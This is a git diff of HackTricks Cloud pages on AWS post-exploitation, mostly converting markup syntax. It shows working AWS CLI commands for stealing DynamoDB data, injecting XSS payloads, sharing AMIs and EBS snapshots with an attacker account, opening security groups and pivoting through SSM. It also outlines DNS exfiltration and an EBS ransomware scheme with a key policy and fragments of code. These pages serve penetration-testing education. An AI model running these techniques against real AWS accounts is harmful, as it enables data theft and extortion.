-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md similarity index 74% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md index a431beae5..b09f35642 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -1,35 +1,22 @@ # AWS - DynamoDB Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## DynamoDB For more information check: -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} ### `dynamodb:BatchGetItem` An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`). -{% tabs %} -{% tab title="json file" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="json file" }} + ```bash aws dynamodb batch-get-item --request-items file:///tmp/a.json @@ -46,19 +33,19 @@ aws dynamodb batch-get-item --request-items file:///tmp/a.json } } ``` -{% endcode %} -{% endtab %} -{% tab title="inline" %} -{% code overflow="wrap" %} +{{#endtab }} + +{{#tab name="inline" }} + ```bash aws dynamodb batch-get-item \ --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ --region ``` -{% endcode %} -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Indirect privesc by locating sensitive information in the table @@ -66,18 +53,16 @@ aws dynamodb batch-get-item \ **Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve: -{% code overflow="wrap" %} ```json aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json // With a.json -{ -"Id" : { +{ +"Id" : { "N": "205" } } ``` -{% endcode %} With this permission it's also possible to use the **`transact-get-items`** method like: 
@@ -104,24 +89,25 @@ aws dynamodb transact-get-items \ **Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve. It allows to use a [subset of comparisons](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html), but the only comparison allowed with the primary key (that must appear) is "EQ", so you cannot use a comparison to get the whole DB in a request. -{% tabs %} -{% tab title="json file" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="json file" }} + ```bash aws dynamodb query --table-name ProductCatalog --key-conditions file:///tmp/a.json - + // With a.json - { -"Id" : { + { +"Id" : { "ComparisonOperator":"EQ", "AttributeValueList": [ {"N": "205"} ] } } ``` -{% endcode %} -{% endtab %} -{% tab title="inline" %} +{{#endtab }} + +{{#tab name="inline" }} + ```bash aws dynamodb query \ --table-name TargetTable \ @@ -129,8 +115,9 @@ aws dynamodb query \ --expression-attribute-values '{":value":{"S":"TargetValue"}}' \ --region ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Indirect privesc by locating sensitive information in the table @@ -211,9 +198,9 @@ aws dynamodb restore-table-from-backup \ This permission allows users to add a **new item to the table or replace an existing item** with a new item. If an item with the same primary key already exists, the **entire item will be replaced** with the new item. If the primary key does not exist, a new item with the specified primary key will be **created**. -{% tabs %} -{% tab title="XSS Example" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="XSS Example" }} + ```bash ## Create new item with XSS payload aws dynamodb put-item --table --item file://add.json 
@@ -230,18 +217,20 @@ aws dynamodb put-item --table --item file://add.json } } ``` -{% endcode %} -{% endtab %} -{% tab title="AI Example" %} +{{#endtab }} + +{{#tab name="AI Example" }} + ```bash aws dynamodb put-item \ --table-name ExampleTable \ --item '{"Id": {"S": "1"}, "Attribute1": {"S": "Value1"}, "Attribute2": {"S": "Value2"}}' \ --region ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table @@ -249,9 +238,9 @@ aws dynamodb put-item \ This permission allows users to **modify the existing attributes of an item or add new attributes to an item**. It does **not replace** the entire item; it only updates the specified attributes. If the primary key does not exist in the table, the operation will **create a new item** with the specified primary key and set the attributes specified in the update expression. -{% tabs %} -{% tab title="XSS Example" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="XSS Example" }} + ```bash ## Update item with XSS payload aws dynamodb update-item --table \ @@ -270,10 +259,11 @@ aws dynamodb update-item --table \ } } ``` -{% endcode %} -{% endtab %} -{% tab title="AI Example" %} +{{#endtab }} + +{{#tab name="AI Example" }} + ```bash aws dynamodb update-item \ --table-name ExampleTable \ @@ -282,8 +272,9 @@ aws dynamodb update-item \ --expression-attribute-values '{":val1": {"S": "NewValue1"}, ":val2": {"S": "NewValue2"}}' \ --region ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} **Potential Impact:** Exploitation of further vulnerabilities/bypasses by being able to add/modify data in a DynamoDB table 
@@ -313,9 +304,8 @@ aws dynamodb delete-backup \ ### `dynamodb:StreamSpecification`, `dynamodb:UpdateTable`, `dynamodb:DescribeStream`, `dynamodb:GetShardIterator`, `dynamodb:GetRecords` -{% hint style="info" %} -TODO: Test if this actually works -{% endhint %} +> [!NOTE] +> TODO: Test if this actually works An attacker with these permissions can **enable a stream on a DynamoDB table, update the table to begin streaming changes, and then access the stream to monitor changes to the table in real-time**. This allows the attacker to monitor and exfiltrate data changes, potentially leading to data leakage. @@ -356,17 +346,4 @@ bashCopy codeaws dynamodbstreams get-records \ **Potential impact**: Real-time monitoring and data leakage of the DynamoDB table's changes. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md similarity index 76% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 4000b19ca..ae2038219 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -1,27 +1,14 @@ # AWS - EC2, EBS, SSM & VPC Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## EC2 & VPC For more information check: -{% content-ref url="../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +../../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} ### **Malicious VPC Mirror -** `ec2:DescribeInstances`, `ec2:RunInstances`, `ec2:CreateSecurityGroup`, `ec2:AuthorizeSecurityGroupIngress`, `ec2:CreateTrafficMirrorTarget`, `ec2:CreateTrafficMirrorSession`, `ec2:CreateTrafficMirrorFilter`, `ec2:CreateTrafficMirrorFilterRule` @@ -30,9 +17,9 @@ An attacker could abuse this to capture all the traffic and obtain sensitive inf For more information check this page: -{% content-ref url="aws-malicious-vpc-mirror.md" %} -[aws-malicious-vpc-mirror.md](aws-malicious-vpc-mirror.md) -{% endcontent-ref %} +{{#ref}} +aws-malicious-vpc-mirror.md +{{#endref}} ### Copy Running Instance 
@@ -43,22 +30,22 @@ Instances usually contain some kind of sensitive information. There are differen aws ec2 describe-images # create a new image for the instance-id -aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 +aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1 # add key to AWS -aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 +aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1 # create ec2 using the previously created AMI, use the same security group and subnet to connect easily. aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1 -# now you can check the instance -aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 +# now you can check the instance +aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 # If needed : edit groups aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1 # be a good guy, clean our instance to avoid any useless cost -aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 +aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 ``` 
@@ -67,9 +54,9 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west **Snapshots are backups of volumes**, which usually will contain **sensitive information**, therefore checking them should disclose this information.\ If you find a **volume without a snapshot** you could: **Create a snapshot** and perform the following actions or just **mount it in an instance** inside the account: -{% content-ref url="aws-ebs-snapshot-dump.md" %} -[aws-ebs-snapshot-dump.md](aws-ebs-snapshot-dump.md) -{% endcontent-ref %} +{{#ref}} +aws-ebs-snapshot-dump.md +{{#endref}} ### Data Exfiltration @@ -77,11 +64,11 @@ If you find a **volume without a snapshot** you could: **Create a snapshot** and Even if you lock down an EC2 so no traffic can get out, it can still **exfil via DNS**. -* **VPC Flow Logs will not record this**. -* You have no access to AWS DNS logs. -* Disable this by setting "enableDnsSupport" to false with: +- **VPC Flow Logs will not record this**. +- You have no access to AWS DNS logs. +- Disable this by setting "enableDnsSupport" to false with: - `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` + `aws ec2 modify-vpc-attribute --no-enable-dns-support --vpc-id ` #### Exfiltration via API calls @@ -91,12 +78,10 @@ An attacker could call API endpoints of an account controlled by him. Cloudtrail You could get further access to network services by opening ports like this: -{% code overflow="wrap" %} ```bash aws ec2 authorize-security-group-ingress --group-id --protocol tcp --port 80 --cidr 0.0.0.0/0 # Or you could just open it to more specific ips or maybe th einternal network if you have already compromised an EC2 in the VPC ``` -{% endcode %} ### Privesc to ECS 
@@ -113,6 +98,7 @@ aws ec2 delete-flow-logs --flow-log-ids --region ### SSM Port Forwarding Required permissions: + - `ssm:StartSession` In addition to command execution, SSM allows for traffic tunneling which can be abused to pivot from EC2 instances that do not have network access because of Security Groups or NACLs. 
@@ -141,35 +127,32 @@ aws eks update-kubeconfig --profile bastion-ec2 --region -- ```shell sudo aws ssm start-session --target $INSTANCE_ID --document-name AWS-StartPortForwardingSessionToRemoteHost --parameters '{"host":[""],"portNumber":["443"], "localPortNumber":["443"]}' --region ``` + 8. The traffic from the `kubectl` tool is now forwarded throug the SSM tunnel via the Bastion EC2 and you can access the private EKS cluster from your own machine by running: + ```shell -kubectl get pods --insecure-skip-tls-verify +kubectl get pods --insecure-skip-tls-verify ``` Note that the SSL connections will fail unless you set the `--insecure-skip-tls-verify ` flag (or its equivalent in K8s audit tools). Seeing that the traffic is tunnelled through the secure AWS SSM tunnel, you are safe from any sort of MitM attacks. Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. - ### Share AMI -{% code overflow="wrap" %} ```bash aws ec2 modify-image-attribute --image-id --launch-permission "Add=[{UserId=}]" --region ``` -{% endcode %} ### Search sensitive information in public and private AMIs -* [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. +- [https://github.com/saw-your-packet/CloudShovel](https://github.com/saw-your-packet/CloudShovel): CloudShovel is a tool designed to **search for sensitive information within public or private Amazon Machine Images (AMIs)**. It automates the process of launching instances from target AMIs, mounting their volumes, and scanning for potential secrets or sensitive data. 
### Share EBS Snapshot -{% code overflow="wrap" %} ```bash aws ec2 modify-snapshot-attribute --snapshot-id --create-volume-permission "Add=[{UserId=}]" --region ``` -{% endcode %} ### EBS Ransomware PoC @@ -271,11 +254,11 @@ First from an 'attacker' AWS account, create a customer managed key in KMS. For The key policy rule needs the following enabled to allow for the ability to use it to encrypt an EBS volume: -* `kms:CreateGrant` -* `kms:Decrypt` -* `kms:DescribeKey` -* `kms:GenerateDataKeyWithoutPlainText` -* `kms:ReEncrypt` +- `kms:CreateGrant` +- `kms:Decrypt` +- `kms:DescribeKey` +- `kms:GenerateDataKeyWithoutPlainText` +- `kms:ReEncrypt` Now with the publicly accessible key to use. We can use a 'victim' account that has some EC2 instances spun up with unencrypted EBS volumes attached. This 'victim' account's EBS volumes are what we're targeting for encryption, this attack is under the assumed breach of a high-privilege AWS account. 
@@ -295,76 +278,72 @@ Next, return to the key policy in the 'attacker' account and remove the 'Outside ```json { - "Version": "2012-10-17", - "Id": "key-consolepolicy-3", - "Statement": [ - { - "Sid": "Enable IAM User Permissions", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:root" - }, - "Action": "kms:*", - "Resource": "*" - }, - { - "Sid": "Allow access for Key Administrators", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Create*", - "kms:Describe*", - "kms:Enable*", - "kms:List*", - "kms:Put*", - "kms:Update*", - "kms:Revoke*", - "kms:Disable*", - "kms:Get*", - "kms:Delete*", - "kms:TagResource", - "kms:UntagResource", - "kms:ScheduleKeyDeletion", - "kms:CancelKeyDeletion" - ], - "Resource": "*" - }, - { - "Sid": "Allow use of the key", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*" - }, - { - "Sid": "Allow attachment of persistent resources", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" - }, - "Action": [ - "kms:CreateGrant", - "kms:ListGrants", - "kms:RevokeGrant" - ], - "Resource": "*", - "Condition": { - "Bool": { - "kms:GrantIsForAWSResource": "true" - } - } + "Version": "2012-10-17", + "Id": "key-consolepolicy-3", + "Statement": [ + { + "Sid": "Enable IAM User Permissions", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:root" + }, + "Action": "kms:*", + "Resource": "*" + }, + { + "Sid": "Allow access for Key Administrators", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Create*", + "kms:Describe*", + "kms:Enable*", + "kms:List*", + "kms:Put*", + "kms:Update*", + "kms:Revoke*", + 
"kms:Disable*", + "kms:Get*", + "kms:Delete*", + "kms:TagResource", + "kms:UntagResource", + "kms:ScheduleKeyDeletion", + "kms:CancelKeyDeletion" + ], + "Resource": "*" + }, + { + "Sid": "Allow use of the key", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": [ + "kms:Encrypt", + "kms:Decrypt", + "kms:ReEncrypt*", + "kms:GenerateDataKey*", + "kms:DescribeKey" + ], + "Resource": "*" + }, + { + "Sid": "Allow attachment of persistent resources", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[Your AWS Account Id]:user/AttackSim" + }, + "Action": ["kms:CreateGrant", "kms:ListGrants", "kms:RevokeGrant"], + "Resource": "*", + "Condition": { + "Bool": { + "kms:GrantIsForAWSResource": "true" } - ] + } + } + ] } ``` @@ -462,7 +441,7 @@ def replace_volumes(ec2_client, instance_volumes): def ebs_lock(access_key, secret_key, region, kms_key_arn): ec2_client = boto3.client('ec2', aws_access_key_id=access_key, aws_secret_access_key=secret_key, region_name=region) - + instance_volumes = enumerate_ec2_instances(ec2_client) all_volumes = [vol for vols in instance_volumes.values() for vol in vols] snapshot_ids = snapshot_volumes(ec2_client, all_volumes) @@ -495,17 +474,4 @@ if __name__ == "__main__": main() ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md similarity index 60% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md index 4c0fa0e1c..8f5ebb565 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump.md @@ -1,19 +1,6 @@ # AWS - EBS Snapshot Dump -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Checking a snapshot locally @@ -46,11 +33,9 @@ make docker/build IMAGE=".img" make docker/run #With the snapshot downloaded ``` -{% hint style="danger" %} -**Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: -{% endhint %} +> [!CAUTION] +> **Note** that `dsnap` will not allow you to download public snapshots. To circumvent this, you can make a copy of the snapshot in your personal account, and download that: -{% code overflow="wrap" %} ```bash # Copy the snapshot aws ec2 copy-snapshot --source-region us-east-2 --source-snapshot-id snap-09cf5d9801f231c57 --destination-region us-east-2 --description "copy of snap-09cf5d9801f231c57" @@ -64,19 +49,16 @@ dsnap --region us-east-2 get snap-027da41be451109da # Delete the snapshot after downloading aws ec2 delete-snapshot --snapshot-id snap-027da41be451109da --region us-east-2 ``` -{% endcode %} For more info on this technique check the original research in [https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/](https://rhinosecuritylabs.com/aws/exploring-aws-ebs-snapshots/) -You can do this with Pacu using the module [ebs\_\_download\_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) +You can do this with Pacu using the module [ebs\_\_download_snapshots](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#ebs__download_snapshots) ## Checking a snapshot in AWS -{% code overflow="wrap" %} ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 ``` -{% endcode %} **Mount it in a EC2 VM under your control** (it has to be in the same region as the copy of the backup): 
@@ -84,8 +66,8 @@ Step 1: A new volume of your preferred size and type is to be created by heading To be able to perform this action, follow these commands: -* Create an EBS volume to attach to the EC2 instance. -* Ensure that the EBS volume and the instance are in the same zone. +- Create an EBS volume to attach to the EC2 instance. +- Ensure that the EBS volume and the instance are in the same zone. Step 2: The "attach volume" option is to be selected by right-clicking on the created volume. @@ -93,7 +75,7 @@ Step 3: The instance from the instance text box is to be selected. To be able to perform this action, use the following command: -* Attach the EBS volume. +- Attach the EBS volume. Step 4: Login to the EC2 instance and list the available disks using the command `lsblk`. @@ -113,14 +95,13 @@ Step 9: Change directory to the "newvolume" directory and check the disk space t To be able to perform this action, use the following commands: -* Change directory to `/newvolume`. -* Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. +- Change directory to `/newvolume`. +- Check the disk space using the command `df -h .`. The output of this command should show the free space in the "newvolume" directory. You can do this with Pacu using the module `ebs__explore_snapshots`. ## Checking a snapshot in AWS (using cli) -{% code overflow="wrap" %} ```bash aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id @@ -146,7 +127,6 @@ sudo mount /dev/xvdh1 /mnt ls /mnt ``` -{% endcode %} ## Shadow Copy 
@@ -156,19 +136,6 @@ You can use this tool to automate the attack: [https://github.com/Static-Flow/Cl ## References -* [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) +- [https://devopscube.com/mount-ebs-volume-ec2-instance/](https://devopscube.com/mount-ebs-volume-ec2-instance/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md new file mode 100644 index 000000000..69042df5f --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-malicious-vpc-mirror.md 
@@ -0,0 +1,15 @@ +# AWS - Malicious VPC Mirror + +{{#include ../../../../banners/hacktricks-training.md}} + +**Check** [**https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws**](https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws) **for further details of the attack!** + +Passive network inspection in a cloud environment has been **challenging**, requiring major configuration changes to monitor network traffic. However, a new feature called “**VPC Traffic Mirroring**” has been introduced by AWS to simplify this process. With VPC Traffic Mirroring, network traffic within VPCs can be **duplicated** without installing any software on the instances themselves. This duplicated traffic can be sent to a network intrusion detection system (IDS) for **analysis**. + +To address the need for **automated deployment** of the necessary infrastructure for mirroring and exfiltrating VPC traffic, we have developed a proof-of-concept script called “**malmirror**”. This script can be used with **compromised AWS credentials** to set up mirroring for all supported EC2 instances in a target VPC. It is important to note that VPC Traffic Mirroring is only supported by EC2 instances powered by the AWS Nitro system, and the VPC mirror target must be within the same VPC as the mirrored hosts. + +The **impact** of malicious VPC traffic mirroring can be significant, as it allows attackers to access **sensitive information** transmitted within VPCs. The **likelihood** of such malicious mirroring is high, considering the presence of **cleartext traffic** flowing through VPCs. Many companies use cleartext protocols within their internal networks for **performance reasons**, assuming traditional man-in-the-middle attacks are not possible. + +For more information and access to the [**malmirror script**](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/tree/master/AWS/malmirror), it can be found on our **GitHub repository**. 
The script automates and streamlines the process, making it **quick, simple, and repeatable** for offensive research purposes. + +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md similarity index 55% rename from pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md rename to src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md index 3d8bb5192..aea1b48dd 100644 --- a/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecr-post-exploitation.md @@ -1,31 +1,17 @@ # AWS - ECR Post Exploitation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
